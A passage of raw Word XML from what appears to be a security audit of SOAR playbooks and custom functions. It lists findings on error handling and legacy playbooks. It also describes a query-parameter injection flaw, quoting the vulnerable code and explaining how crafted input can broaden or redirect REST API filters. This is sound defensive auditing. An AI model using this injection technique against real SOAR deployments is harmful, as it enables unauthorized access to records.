        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except:</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phantom.error("Unable to parse JSON")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>except:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> catches everything (including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>KeyboardInterrupt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SystemExit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and continues, which can mask real failures and lead to silent partial results in an investigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>UrlScan_IO_Dynamic_Analysis.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the VirusTotal normalize blocks have related fragility (unguarded dict indexing like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>summary_data['harmless']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>VirusTotal_v3_Dynamic_Analysis.py:193</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>KeyError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and abort the whole branch; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>confidence = 100 - int((undetected/vendors)*100)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ZeroDivisionError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vendors == 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>except (ValueError, KeyError, TypeError) as e:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and guard divisions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if not vendors: continue</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-396; CWE-391 Unchecked Error Condition. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-17 — Legacy python_version and Classic-editor playbooks carry the ungated destructive patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Advisory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/block_indicators.json, malware_hunt_and_contain.json, hunting.json, trustar_enrich_indicators.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware_hunt_and_contain.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hunting.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> declare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (legacy) while the rest declare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"3.13"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators/malware/hunting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vpe_type: Classic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (older editor) and carry the oldest patterns (no prompts — see PB2-10). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: Not a vulnerability, but the Classic/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"3"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks are the ones with the ungated destructive actions and should be prioritised for modernisation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: migrate Classic playbooks to Modern VPE and add approval gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-22 Unsupported System Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.8 Management of technical vulnerabilities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 SOAR Custom Functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 18 unique findings: 8 Medium, 9 Low, 1 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-01 — Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.5). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/container_update.py:46,54; workbook_add.py:67,82,84; workbook_task_update.py:100,108; asset_get_attributes.py:33; indicator_tag.py:49; indicator_get_by_tag.py:93; playbooks_list.py:41,44,56; find_related_containers.py:72-80,84,128,151,163</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_update.py:46</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>url = phantom.build_phantom_rest_url('ph_user') + f'?_filter_username="{owner}"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_update.py:54</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... + f'?_filter_name="{owner}"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (role lookup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>workbook_add.py:67,82,84</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... + '?_filter_name="{}"'.format(workbook)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>workbook_task_update.py:100,108</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... + f'?_filter_username="{owner}"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset_get_attributes.py:33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>params = {'_filter_name': '"{}"'.format(asset)}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator_tag.py:49</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>params = {'_filter_value__iexact': f'"{indicator}"'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator_get_by_tag.py:93</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'_filter_tags__contains': f'"{tag}"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks_list.py:41,44,56</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter_name/category/name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find_related_containers.py:72-80,84,128,151,163</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>f'&amp;_filter_create_time__gt="{...}"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>f'&amp;_filter_status__in={v}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>f'_filter_cef__{k}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>f'&amp;_filter_id__in={group}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>f'?_filter_value_hash__in={group}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These functions build SOAR REST URLs/params by interpolating attacker-influenceable strings directly into Django-ORM-style </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query parameters with no URL-encoding and no escaping of the surrounding double quotes. A value containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can inject additional query parameters or alter the filter expression. Because the SOAR REST API honours many </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter_&lt;field&gt;__&lt;op&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operators plus controls like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>page_size</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_exclude_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pretty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, an attacker who controls one of these inputs can broaden or redirect the query (e.g. make an "owner" lookup resolve to a privileged user/role, make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find_related_containers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> match unrelated incidents, or enumerate records beyond the intended scope). In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find_related_containers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>field name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> itself (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter_cef__{k}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is interpolated, allowing injection of a different field or a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operator suffix. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t>: Source → sink: artifact/container CEF value (or playbook author field) → function input (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>owner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>workbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>field_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) → f-string → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.requests.get(url, verify=False)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — requires a playbook to map an attacker-influenced CEF field into the vulnerable parameter (common for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>value_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
